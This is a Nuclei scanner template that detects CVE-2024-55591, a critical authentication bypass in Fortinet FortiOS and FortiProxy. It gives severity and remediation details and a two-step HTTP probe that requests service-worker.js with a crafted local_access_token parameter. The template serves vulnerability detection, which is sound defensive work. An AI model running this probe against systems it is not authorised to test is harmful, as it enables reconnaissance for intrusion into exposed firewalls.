id: CVE-2024-55591 info: name: Fortinet - Authentication Bypass author: rootxharsh,iamnoooob,pdresearch severity: critical description: | Fortinet FortiOS is vulnerable to an information disclosure via service-worker.js that could allow an attacker to access sensitive information.This vulnerability affects FortiOS and could potentially lead to unauthorized access to the system. impact: | Unauthenticated attackers can bypass authentication mechanisms to access sensitive system information and gain unauthorized access to FortiOS and FortiProxy systems. remediation: | Update Fortinet FortiOS and FortiProxy to versions that patch CVE-2024-55591 as specified in Fortinet's security advisory. reference: - https://github.com/watchtowrlabs/fortios-auth-bypass-poc-CVE-2024-55591/blob/main/CVE-2024-55591-PoC.py - https://nvd.nist.gov/vuln/detail/cve-2024-55591 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-55591 cwe-id: CWE-288,NVD-CWE-Other epss-score: 0.94124 epss-percentile: 0.99916 cpe: cpe:2.3:a:fortinet:fortiproxy:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: fortinet product: fortiproxy tags: cve,cve2024,fortinet,disclosure,fortios,kev,intrusive,vkev,vuln flow: http(1) && http(2) http: - method: GET path: - "{{BaseURL}}/login?redir=/ng" host-redirects: true max-redirects: 2 matchers: - type: word words: - '' internal: true - raw: - | GET /service-worker.js?local_access_token={{randstr}} HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: body words: - "api/v2/static" - "self.addEventListener" condition: and - type: word part: content_type words: - "application/javascript" - type: status status: - 200 # digest: 490a0046304402204a865514b5853368b05326bbf897cfa12211da77fae44d32e68cd31878c714ae02207b3e7e56e7200ee9ca2a04e8dd303140cab1db551a0316ffd02e4391f5c375c7:922c64590222798bb761d5b6d8e72950